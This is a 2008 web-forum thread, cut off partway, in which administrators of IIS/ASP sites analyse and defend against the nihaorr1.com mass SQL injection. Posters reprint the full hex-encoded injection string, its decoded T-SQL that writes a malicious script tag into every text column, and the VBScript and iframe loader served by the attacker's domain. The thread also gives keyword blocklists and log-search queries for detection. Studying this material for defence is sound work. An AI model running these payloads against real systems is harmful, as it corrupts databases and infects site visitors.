Anyone know about www.nihaorr1.com/1.js? [Answered]RSS

109 replies

Last post Dec 12, 2008 09:14 PM by Paul Bishop

  • Anyone know about www.nihaorr1.com/1.js?

    Apr 17, 2008 05:35 PM|kckriegs|LINK

    The db that supports our companies ecommerce is filling up with this url. We seem to be victims of a sql injection attack. Is anyone else experiencing? How are you resolving? We just happened to see this data...are there other adverse affects to resources other than data?

    Any shared experience would be helpful!

  • Rovastar Rovastar

    5469 Posts

    MVP

    Moderator

    Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 18, 2008 05:19 AM|Rovastar|LINK

    Not noticed anything.

    Looks dodgy though. I presume you have only just started getting these. Only from 11 Apr?

    That is when the domain nihaorr1.com was registered. IP geolocation shows this machine in Beijing, China

    What page are they hammering? What do the IIS logs say? Then look at that page. Nearly all hacks now are over http so it wil be the devs fault for having sloppy code.

    Troubleshoot IIS in style
    https://www.leansentry.com/
  • Rovastar Rovastar

    5469 Posts

    MVP

    Moderator

    Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 18, 2008 05:34 AM|Rovastar|LINK

    Yeah it is a script bot that spreads virus seems to be very wild atm.

    Googling nihaorr1.com there are many references to it on sites http://www.google.co.uk/search?hl=en&q=nihaorr1.com&btnG=Search&meta= (11,000 references at the time)

    Even when I clicked on a link and the virus checker popped up warning me of a virus there. I'll not try again.

    It just seems to affect asp pages at the moment. 

    There was a few recent vulenerabilities with asp and IIS over the last 6 months like 

    http://www.microsoft.com/technet/security/Bulletin/MS08-006.mspx

    I expect it is explioting one of those.

    Take care.

    Troubleshoot IIS in style
    https://www.leansentry.com/
  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 18, 2008 10:25 AM|onionlips|LINK

    We have been hit by this as well. Lucky backup ran last night just prior to the attack.

    Our initial investigations are pointing at an attack through IIS using ASP in an overload. 

    whois lookup showing nihaorr1 registered via Chinese registrar xinnet.com

    I used the safety of a VM to look under the hood at the operations of the 1.js file.

    It writes several iframes to that seem to come up as page not found (Chinese language pack) 

    A look at the script is bit confusing and garbled (of course) but consistent reference is made to "cuteqq" as a variable and variable prefix. It creates an executable I have yet to determine its intent or impact.

    Googling "cuteqq" pulls up all sorts of harmful flagged pages.  Anyone have any insight on that?

     
     

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 18, 2008 01:16 PM|autodynamic1|LINK

    I also have been hit by this attack on Saturday 4/12/08. It compromised our database and overwritten that script into all of your products. Luckily a database restore fixed the problem. Two days later the same thing happened, I have changed all the database and login passwords and did another db restore. Now today 4/18/08 we got hit again by the same thing but this time as the pages are loaded ActivX is activated and wants to run but of course I did not allow it. Anybody has successfully solved this situation?

    nihaorr1 xss sql injection

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 18, 2008 02:17 PM|rwmorey|LINK

    Hi --

     We have been hit with this virus/injection as well. We are running Windows 2003 and I believe I have all the security patches on our system.

    Does anyone have any idea how to prevent this from re-happening?

    Rich

     

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 18, 2008 03:17 PM|eftennis|LINK

    We were hit as well last week by a similar one.   aspder

    Now, last night we were hit by the nihaorr1 attack.  Last nights was a little more sophisticated.   It inserted script logic into various fields in the database.  We ran sql queries to clean it out since no data was removed.  

    It appears to be a SQL Injector.  But, we have not found the exact fix for our asp scripts to stop it.  I managed to find entries in our log files to show the time.  Interesting part is that it came from a local connection.  This appears to be a virus that hijacks a computer to do it's dirty work, since the source is not from China.

     

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 18, 2008 03:57 PM|bcondrey|LINK

    Can you let me know what you searched for specifically in your logs? What was the internal PC infected with, did you get a virus name? We had a PC that was infected by a virus called infostealer , but we aren't sure if the PC caught it from the webserver, or vice-versa. Thanks Barry

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 18, 2008 07:57 PM|davcox|LINK

    Yikes, pretty dangerous, a good time to scan your content for this URL and notify the website owners so they can fix their websites, applications and then fix the form validation logic.   

    Looks like someone is doing a lot of script code injection into a lot of vulnerable (read: poorly written) forms that aren't validating input to strip out script code.  These sites are then carrying javascript code that launches Remote Data Services Control ActiveX control ... to exploit a few known vulnerabilities ... use WFetch to debug this!!!  (You can get WFetch for free in the IIS6.0 Resource Kit.)

    For example, here is how I looked at this:

    GET http://www.nihaorr1.com:80/1.js HTTP/1.1\r\n
    Host: www.nihaorr1.com\r\n
    Accept: */*\r\n
    \r\n

    HTTP/1.1 200 OK\r\n
    Connection: Keep-Alive\r\n
    Content-Length: 110\r\n
    Via: 1.1 RED-PRXY-29\r\n
    Date: Fri, 18 Apr 2008 23:53:38 GMT\r\n
    Content-Type: application/x-javascript\r\n
    ETag: "30e1873949a1c81:237"\r\n
    Server: Microsoft-IIS/6.0\r\n
    Last-Modified: Fri, 18 Apr 2008 11:42:04 GMT\r\n
    Accept-Ranges: bytes\r\n
    \r\n
    document.writeln("<iframe width=\'10\' height=\'1\' src=\'http:\/\/www.nihaorr1.com\/1.htm\'><\/iframe>");\r\n
    \r\n

    Then I made a second request to the iframe it tries to create:   

     

    GET http://www.nihaorr1.com:80/1.htm HTTP/1.1\r\n
    Host: www.nihaorr1.com\r\n
    Accept: */*\r\n
    \r\n

    HTTP/1.1 200 OK\r\n
    Connection: Keep-Alive\r\n
    Content-Length: 1160\r\n
    Date: Fri, 18 Apr 2008 23:53:51 GMT\r\n
    Content-Type: text/html\r\n
    ETag: "fc6b5a164da1c81:237"\r\n
    Server: Microsoft-IIS/6.0\r\n
    Last-Modified: Fri, 18 Apr 2008 12:09:43 GMT\r\n
    Accept-Ranges: bytes\r\n
    \r\n
    <script language=VBScript>\r\n
    on error resume next\r\n
    Set downf = document.createElement("object")\r\n
    downf.setAttribute "classid", "clsid:BD9"&"6C556-6"&"5A3-11D"&"0-983A-00C"&"04FC2"&"9E36"\r\n
    str="Microsoft.XMLHTTP"\r\n
    Set O = downf.CreateObject(str,"")\r\n
    if Not Err.Number = 0 then\r\n
    err.clear\r\n
    document.write("<iframe width=""10"" height=""10"" src=""http://www.nihaorr1.com/Real.gif""></iframe>") \r\n
    document.write("<iframe width=""5"" height=""5"" src=""http://www.nihaorr1.com/Yahoo.php""></iframe>")\r\n
    document.write("<iframe width=""5"" height=""5"" src=""http://www.nihaorr1.com/cuteqq.htm""></iframe>")  \r\n
    document.write("<iframe width=""5"" height=""5"" src=""http://www.nihaorr1.com/Ms07055.htm""></iframe>")  \r\n
    document.write("<iframe width=""5"" height=""5"" src=""http://www.nihaorr1.com/Ms07033.htm""></iframe>")  \r\n
    document.write("<iframe width=""5"" height=""5"" src=""http://www.nihaorr1.com/Ms07004.htm""></iframe>")\r\n
    else\r\n
    document.write("<iframe width=""0"" height=""0"" src=""http://www.nihaorr1.com/Ajax.htm""></iframe>")\r\n
    document.write("<iframe width=""0"" height=""0"" src=""http://www.nihaorr1.com/Ms06014.htm""></iframe>")\r\n
    end if\r\n
    </script>\r\n

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 19, 2008 09:36 AM|asidana|LINK

    i've been using below regex

    function AlphaNumOnly(MyString)
    sResult=Trim(MyString)
     Set re = New RegExp
     re.IgnoreCase = True
     re.Global = true
     re.Pattern = "[^a-z|A-Z|0-9|\.]"
     sResult = re.Replace(sResult, "")
     
    AlphaNumOnly=sResult
    end Function

     and got hit, couln't find anything in my serverlog about how its done

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 19, 2008 10:47 AM|rwmorey|LINK

    I found this security notice on Microsofts website finally

    http://www.microsoft.com/technet/security/advisory/951306.mspx I have just made the prescribed changes. Hopefully this will stop this from getting me again.

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 20, 2008 12:06 AM|powlette|LINK

     Long story short, it's definitely SQL injection. here's the offending url:

    orderitem.asp?IT=GM-204;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C004000 4300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F0072002000430055 00520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D00200073007900 73006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069 006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F0072002000 62002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D0031 0036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00 200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C00450028004000400046004500540043 0048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B00 27005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C 005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E006E00 6900680061006F007200720031002E0063006F006D002F0031002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E0045 00580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E0044002000 43004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F00430075 00720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);--

    decoding that binary data which is cast to a varchar yields this:

    DECLARE @T varchar(255)'@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name'b.name from sysobjects a'syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T'@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar'['+@C+']))+''<script src=nihaorr1.com/1.js></script>''')FETCH NEXT FROM Table_Cursor INTO @T'@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

    And there you have it. It finds all text columns in the database and adds itself to it.

     

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 20, 2008 11:46 AM|rwmorey|LINK

    Is there a "best practice" for blocking this or similar type attacks?

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 20, 2008 12:51 PM|eftennis|LINK

    Thanks.   That is the first proof I have seen as to how this works. 

    We added a logging function to our sql calls to try to trap for this type of information.

    We have been adding a common script to the top of all of our pages to look for "offending" data in the url parms or the form variables.   Seems like a never ending task, though.  Doing the rework suggested to stop SQL Injectors is not an easy project given the hundreds of pages we have. 

    We are continuing to fight this.  It is a very "resource draining" project.

     

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 20, 2008 12:58 PM|xtal|LINK

    "Best Practice" - lots of them - primarily checking each form processing script to ensure that one cannot simply pass in a long field and/or content which has sql commands such as "select", "update", etc.

    As you can see from this particular situation, the data may not be readily seen as offending (ie, the binary encoding).  Testing length is therefore pretty important as a rule.  If you are expecting to insert a product code into a shopping cart or an email address into a registration table, there is no reason to allow a string longer than the field length to be submitted to the database.  One could argue that because of that, keep your field lengths to the minimum, etc.

    Minimize the number of dynamic sql statements  

     
    Keep in mind that just limiting your form field's "maxlength" property does little value as these attacks are not validated by any server side browser - they are launched via script or program and often at a very rapid pace.

    If your db connection for your site is using "sa" or equivalent, you also have a problem because they can launch extended stored procs.  Make sure your db connection is using "user" level privileges only.

    these are some of the bigger items - there is lots on the net on the topic of 'sql injection'


     

     

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 20, 2008 12:59 PM|asidana|LINK

    i have banned ip range for now. it's residental adsl line from china

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 20, 2008 08:19 PM|nhertz|LINK

    I want to follow up on all the controversy and theories regarding the massive ongoing iframe injections pointing to domains such as nmidahena.com, aspder.com and more recently: nihaorr1.com

    My intention is to focus a little on the facts rather than amplify the ongoing rumours and theories since this is causing frustrated webmasters to attempt hundreds of different methods to avoid these attacks with no luck.

    The attacks appear to come from China in relation to the public movements in order to boicot China’s Olympic Games.

    To answer the question whether this attack might be using more complex methods beyond just a simple sql injection, the answer is yes and no.
    The injection appears to be VERY SIMPLE. It does not need to be an ASP page containing a form. Last week we cleaned and patched up more than 10 websites affected by these attacks and 8 of them had been injected through the querystring of a simple "select" page. No forms or update statements existed on the pages from where the injection was entering.
    However, the command being executed is fairly complex in itself.

    I'm saying this because many webmasters are going mad patching up sensitive forms, restricting session id's etc.. only to get attacked again and again.
    You will indeed need to strengthen your code the sooner the better, but in this particular case consider the following for a temporary solution:

    Create an include file with something like this:

    <%
    if instr(lcase(sql),";--")>0 then
    response.redirect("index.asp")
    end if

    if instr(lcase(sql),"nvarchar")>0 then
    response.redirect("index.asp")
    end if
    %>

    Call it, forexample, Validator.asp and put it right before your select statements are executed:

    <!--#include file="validator.asp"-->
    rs.Open sql

    This will not permit some of the key words required to execute this command to take place and therefore the malicious Exec will not be allowed.

    Ofcourse you have to discover which pages are being used to inject this code.
    Most likely it is not a page that requires a member session to be viewed since the spiders are attacking pages that are cached in Google.

    Is there a tool or a mechanism to find it?
    The best way to discover when and where the attack is taking place is by running, forexample, SQL Server Profiler.
    Set it to record only Exec commands and when the injection happens it will show up and should reflect something like this:

    SELECT Musicas.Artistas, Musicas.Titles, Musicas.Formatos, Musicas.MemIDs, Musicas.Enlsae, Mem.Statesa, Mem.Cities, Mem.Paises, Mem.Users FROM Musicas, Mem Where Musicas.Titles = 'acb;DECLARE @S NVARCHAR(4000);SET @S=CAST0x440045000043005500520053004F005200200046004F0050020004600450054004300480020004E00450058005400

    2000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400

    054002C0040004300200057280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00

    270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E006E0

    06900680061006F00720010062006C0065005F0043007500720073006F007200
    AS NVARCHAR(4000));EXEC(@S);--' And Mem.ID = Musicas.MemIDs ORDER BY Mem.Fealogs DESC

    Once you run the statement through the descrypter you'll get something like this:

    DECLARE @T varchar(255)'@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name'b.name from sysobjects a'syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T'@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar'['+@C+']))+''<script src=nihaorr1.com/1.js></script>''')FETCH NEXT FROM Table_Cursor INTO @T'@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

    This shows how the nihaorr1.com domain is being used by the script to harrass the users that visit your page where the script is executed.
    You can also see from the above command that the Exec will try to inject every table in your database which can contain varchar type.

    This is a very annoying attack since the spiders appear to be running in a circle on constant autopilot. However, don't go about thinking that this is as bad as it gets because the Exec command could easily have been programmed to delete your tables and even drop tables if the external users are configured to have such rights.
    I'm saying this to put a rush on everyone affected by these attacks and to get their sites fixed up as soon as possible.
    These attacks may just be a pre-warning, and if the attackers alter the code to make it delete and drop instead, then we'll be facing much bigger problems.

    Forget about wasting time and money on expensive antivirus and firewall solutions. They cannot do anything against SQL injection attacks and it is a common practice around forums to try and give people a false sense of security by pasting links to different software companies. These attacks are happening where there's vulnerable ASP code and no expensive software can prevent or "clean" this.

    Feel free to contact me and I'll do my best to get back to you.

    Regards,

    Nicolai Hertz
    Software Programmer

    2003 ASP nihaorr1 xss sql injection Iframe injection aspder nmidahena

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 20, 2008 10:35 PM|therage3k|LINK

    Hi,
    Having had a couple customer's impacted who did not have database back-ups going, thought folks might want a way to clean-up the damage caused by these injections.

    This was my solution - it ain't perfect (for example, some folks have variations in the format of injected script tags), but use it / tweak it / be careful as it DOES remove text forever and ever.

    It is fairly generic and in Query Analyzer you can comment out the EXEC and uncomment the PRINT if you want to see the SQL it will run - it simply hunts for the string you provide and removes it.  It will hit ntext fields if the legnth of data is not over 8000 bytes.

    http://shop.zettaspace.com/knowledgebase.php?action=displayarticle&catid=1&id=1

    Hope this helps.

     

    nihaorr1 sql injection aspder clean-up

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 20, 2008 10:49 PM|rwmorey|LINK

    We appear to have been hit by this through our website that did have a customer entry form connected to an ASP page inserting records. For now I have remove this page and changed the user permission to only SELECT from the appropriate tables. Will this patch my SQL server to prevent this from hitting us again?

     Thanks

    Rich

  • Rovastar Rovastar

    5469 Posts

    MVP

    Moderator

    Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 21, 2008 05:28 AM|Rovastar|LINK

    Thanks for the update everybody. Looking like it is spreading quickly atm judging by how many views this topic has..

    I still don't think any of my servers have be hit yet but going to have a more details search later.

    Troubleshoot IIS in style
    https://www.leansentry.com/
  • Rovastar Rovastar

    5469 Posts

    MVP

    Moderator

    Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 21, 2008 06:16 AM|Rovastar|LINK

    Also here is a useful cheatsheet for SQL injection 

    http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/

    You could use some of the techniques there to test the security of your site and gives a clever insight about some of teh techniques used in SQL injections. Basically if you can get some/any information or error message back then you are at risk.

    The attack used here is a combination of many on that site.

    Troubleshoot IIS in style
    https://www.leansentry.com/
  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 21, 2008 08:55 AM|bencash|LINK

    I have been targeted by this SQL injection exploit.  My ASP programmer is not available for a few days.  Can anyone tell me how to make my MSSQL database read only for the time being?  I do not need anyone to be able to modify this database for the time being, and this would be a simple workaround I guess for now.

    Thanks

    Ben Cashdan 

  • Rovastar Rovastar

    5469 Posts

    MVP

    Moderator

    Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 21, 2008 09:51 AM|Rovastar|LINK

    bencash

    I have been targeted by this SQL injection exploit.  My ASP programmer is not available for a few days.  Can anyone tell me how to make my MSSQL database read only for the time being?  I do not need anyone to be able to modify this database for the time being, and this would be a simple workaround I guess for now.

    Thanks

    Ben Cashdan 

    You are going to allow your ASP programmer back after allowing your site to be hacked. ;)

    Find out what the user connecting to the DB in the connection string is and make that user read only. For more deatils direct your question over to a SQL forum like www.sqlteam.com

    Troubleshoot IIS in style
    https://www.leansentry.com/
  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 21, 2008 11:31 AM|Simontasker|LINK

    This threat is the second type my company has been attacked by, After the first attack 2 weeks ago by a different virus we have managed to fend off attacks, but this www.nihaorr1.com/1.js? has caused alot of trouble. I have only recently started as the web developer for a new company, and ive never really used asp as my main language so this is a difficult time for me. If anyone has any further input other than what is already here please post so people like myself stand a chance.

     Thanks

    Simon

     

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 21, 2008 02:07 PM|MisterZimbu|LINK

    One of my clients has been affected by this exploit, but with some notable differences:

    • Only a few tables in the database were touched, and I can't seem to find a commonality between them (which goes against what the script that was posted earlier was showing).
    • I can't find any evidence of attempts at an injection attack or a successful one in the IIS logs.

    Has anyone who's been affected by this seen any other ways that the attacker could have possibly gotten through besides probing for vulnerabilities in the querystring?

     

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 21, 2008 04:16 PM|sirach3|LINK

    I had the same experience as misterzimbu - only 6 or 7 tables were hit, out of some 50 or so possible tables, in an attack on April 19.  I'm guessing maybe they used a "TOP 6" in the query?  By only hitting a few tables, it achieved a more subtle effect that was not noticed for a full day, whereas attacking all tables would have been apparent immediately.  As in nature, a successful parasite does not kill its host right away.

    Thanks nhertz for the "validator" script suggestion above - a good first line of defense, in addition to all the other usual SQL Injection precautions.  I've learned a painful lesson this past weekend.

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 21, 2008 04:41 PM|MisterZimbu|LINK

    I was able to come up with an explanation for both issues.  They did in the end came through with a SQL injection attack, I was just looking at the wrong versions of the log files.

    As for the tables that were touched, my explanation was that the largest tables were hit first.  The SQL command will eventually hit its timeout doing all the updates on the rows in those tables and not run on the rest.
     

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 21, 2008 04:53 PM|racekites|LINK

    how to fix ??

    Are we sure that this is an attack through the URL and not through a form ??

    Well my website has been hit twice with this and it has caused serious damage and outage time each time...

    I've come up with a possible quick fix. On my site i have an include file which is included in each asp file. This include file has all the presentation etc....

    In the top of this file i now have a check of the query string being passed, if an illegal value is found then it fowards the page directly to google without doing any database stuff :

    <%

    PATH_INFO = Request.ServerVariables("PATH_INFO")
    QUERY_STRING = Request.ServerVariables("QUERY_STRING")
    SCRIPT_NAME = Request.ServerVariables("SCRIPT_NAME")


    dim passedString(15)

    passedString(0) = "DECLARE"
    passedString(1) = "NVARCHAR"
    passedString(2) = "SET"
    passedString(3) = "CAST"
    passedString(4) = "0x"
    passedString(5) = "("
    passedString(6) = ")"
    passedString(7) = "--"
    passedString(8) = "@"
    passedString(9) = ";"
    passedString(10) = "-"
    passedString(11) = "SELECT"
    passedString(12) = "declare"
    passedString(13) = "set"
    passedString(14) = "cast"
    passedString(15) = "nvarchar"

    For each x in passedString

        stringOkay = InStr(QUERY_STRING, x)
        'response.write (stringOkay)
        If stringOkay <> 0 Then response.redirect ("http://www.google.com")
        'response.write ("<br/>Found." & x)
       
    Next
    %>
     

    Only time will tell if this will work though !!

    Are there any other suggestions on how to deflect these attacks ??

     

    Cheers
    A

     

     

     

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 21, 2008 05:16 PM|pb_aldea|LINK

    Greetings,

    My SQL instructions blacklist includes:

    exe
    create
    declare
    script
    insert
    update
    drop
    delete
    insert
    go

    Both query string and form data is filtered. Even then, somehow, one administartor with an infected computer opened the security breach. The infection probably adds the instruction in the form data. 

    Lesson learned: Trust no one.

    Now, this is where the fun begins... I'm having trouble trying to restore the backups made 2 weeks ago, even when my backup file states that the available data extends up to 4 months ago I still keep geting yesterday's corrupted data. SQL documentation is not helping me.

    Any clue?

    Thanks, best regards.

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 21, 2008 05:51 PM|Sleuth23|LINK

     MZ,

     

    CAn you shed some light as to what you searched for to determine how you were compromised. What logs did you search and what did you search for? 

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 21, 2008 06:10 PM|pb_aldea|LINK

    On log files I found nothing and form data is not logged anywhere.

    Lately I've found malformed links from my own site but they're not an issue, it's just the script that ran more than once on the same table and now the content has some strings like <scr<scr<script src=...

    I'm wondering if the system tables were affected too, this issue with my backup kept me stick to my desk the whole weekend.

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 21, 2008 08:08 PM|Sleuth23|LINK

    maybe someone can answer this.

     

    would be safe to assume that if there is nothing in the iis logs that it was because the inject was formed based?

    If it was url based, would i see something in the IIS logs?

     

    The sevrer was restored but i cant recommend it go back on line until we identify the attack vector and vulnerability. If it is just a poorly coded form or two, that is an easy fix.

     

    Any help appreciated. 

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 21, 2008 11:07 PM|steve schofield|LINK

    If it's in a querystring variable, this would be logged into your IISLogs.  SQL injections can happen either in a form post, but normally it is a mal-formed URL. 

    Steve Schofield
    Windows Server MVP - IIS
    http://iislogs.com/steveschofield
    http://www.IISLogs.com
    Log archival solution
    Install, Configure, Forget

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 21, 2008 11:56 PM|Sleuth23|LINK

    thanks steve

     

    i have found nothing in the iis logs thus far. I am still looking though.

     Anywhere else i should be looking?
     

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 22, 2008 09:22 AM|lossman|LINK

    Thanks for all the info.

    I did set up the Profiler assuming you meant to track Exec: Prepared SQL.  I didn't change any other defaults.

    Brett

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 23, 2008 06:54 PM|bestis|LINK

    This is a site that is reached when a user clicks on an attachment (lately Tibetan rights stuff) that downlaods an infected JavaScript file. It is malicious and you really need to block it incoming and outgoing. If you go to http://whois.domaintools.com/nihaorr1.com you'll see that it is hosted in China.

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 24, 2008 02:06 PM|fabrica.cz|LINK

    That helped me. For the SQL user dissalow permisson for SELECT for tables syscollums and sysobjects.

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 24, 2008 05:11 PM|nhertz|LINK

    I would advise anyone affected by this attack to activate the SQL profiler (or equivalent) and set it to record only EXEC commands. If your website then becomes infected again you can quickly scroll through the profiler output and find the "suspicious" command where the injection has entered. This should also give you a hint of the exact page that had the vulnerability.

    I cleaned up a site this week where the profiler had recorded:

    SELECT TOP 100 People.Countries, States.Titles, Houses.Types FROM People, States, Houses Where People.Titles LIKE '%agent;DECLARE @S NVARCHAR(4000);SET etc......

    So I could quickly locate the page which had the SELECT TOP 100 statement.
    That is where I added the quick fix:

    <%
    some code here....
    %> 
    <!--#include file="validator.asp"-->
    <%
    rs.Open sql
    %>

     With the validator file containing:

    <%
    if instr(lcase(sql),";--")>0 then
    response.redirect("index.asp")
    end if

    if instr(lcase(sql),"nvarchar")>0 then
    response.redirect("index.asp")
    end if
    %>

     Cheers and good luck,

    Nicolai Hertz
    software programmer

    Iframe injection aspder sql injection hacking nmidahena attack

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 25, 2008 01:22 PM|xp_cmdshell|LINK

    You guys need to get a clue...it's called prepared statements. 

  • Rovastar Rovastar

    5469 Posts

    MVP

    Moderator

    Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 25, 2008 03:42 PM|Rovastar|LINK

    Now the story is on slashdot with links to this thread

    http://it.slashdot.org/article.pl?sid=08/04/25/1358234 

    so beware the LAMPs trolls...*waves*...:) and the increased traffic to Steve's server. :) It also links to http://www.f-secure.com/weblog/archives/00001427.html which is a good summary basic what is said in this thread with a few extras.
    Troubleshoot IIS in style
    https://www.leansentry.com/
  • Rovastar Rovastar

    5469 Posts

    MVP

    Moderator

    Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 25, 2008 03:49 PM|Rovastar|LINK

    xp_cmdshell

    You guys need to get a clue...it's called prepared statements. 

     


    Thanks for that but who needs to get a clue?

    Have you ever been a web hosting admin? I expect not. You might be one of the few devs that can actually code properly hence can fix the problem. Admin don't we just have bad devs that cannot code properly and we try and minimise the damage. What can we do shut down the database?

    It seems clear that now it is the slack devs fault you are casting blame in the wrong place.

    Troubleshoot IIS in style
    https://www.leansentry.com/
  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 25, 2008 05:12 PM|steve schofield|LINK

    Prepared statements generally are stored procedures, at least that is my understanding.  Dynamic SQL type pages can be exposed to sql injection attacks.  Of course if the stored procedure takes input without being validated, it can be also.  But is one layer deeper.  Only good error coding can prevent it. 

    Steve Schofield
    Windows Server MVP - IIS
    http://iislogs.com/steveschofield
    http://www.IISLogs.com
    Log archival solution
    Install, Configure, Forget

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 25, 2008 05:45 PM|jdybka|LINK

     I use a filter called WebKnight to filter out SQL injection attempts and other crud. You can Google it - it's open source and can give you some .htaccess functionality for IIS.

    It is blocking these requests from China for us.

    It's installed as an isapi filter.

    Jilly
     

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 25, 2008 06:32 PM|xp_cmdshell|LINK

    steve schofield

    Prepared statements generally are stored procedures, at least that is my understanding.  Dynamic SQL type pages can be exposed to sql injection attacks.  Of course if the stored procedure takes input without being validated, it can be also.  But is one layer deeper.  Only good error coding can prevent it. 

     

     

    <div style="border: 2px ridge white; margin: 10px; padding: 10px; font-size: 10pt; font-family: courier new; background-color: rgb(238, 238, 238);">Dim UserSuppliedString as String Request.QueryString("UserSuppliedString")

    Dim cmd As 
    new SqlCommand("SELECT * FROM blahblah WHERE id = @au_id")
    Dim param 
    = new SqlParameter("au_id", SqlDbType.VarChar)
    param.Value 
    = UserSuppliedString
    cmd.Parameters.Add(param)
    </div>

     

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 26, 2008 05:56 AM|steve schofield|LINK

    Thanks for posting a clarification.  btw.

    For those who want to use Log parser to detect in your IISLogs if you've been hit, here are a few log parser examples.

    'This will find all webpages that had sql injection.  You can change the wording between the %% to look for a different string
    logparser -i:iisw3c "select date,time,cs-uri-stem,cs-uri-query from <example.com> where cs-uri-query like '%CAST%'" -o:csv

    'This will give you the first time your site was hit, if applicable. 
    logparser -i:iisw3c "select date,time,cs-uri-stem,cs-uri-query from <example.com> where cs-uri-query like '%1.js%'" -o:csv

    'Download Log Parser 2.2
    http://www.iis.net/downloads/default.aspx?tabid=34&g=6&i=1287

    Steve Schofield
    Windows Server MVP - IIS
    http://iislogs.com/steveschofield
    http://www.IISLogs.com
    Log archival solution
    Install, Configure, Forget

  • Rovastar Rovastar

    5469 Posts

    MVP

    Moderator

    Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 26, 2008 12:28 PM|Rovastar|LINK

     steve if they were encoded in hex

       DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x440045004300
       4C00410052004500200040005400200076006100720063006800610072
       00280032003500350029002C0040004300200076006100720063006800
       610072002800320035003500290020004400450043004C004100520045
       0020005400610062006C0065005F00430075.........

    etc 

    wouldn't we have to search for something likethat

     

    Troubleshoot IIS in style
    https://www.leansentry.com/
  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 26, 2008 01:30 PM|steve schofield|LINK

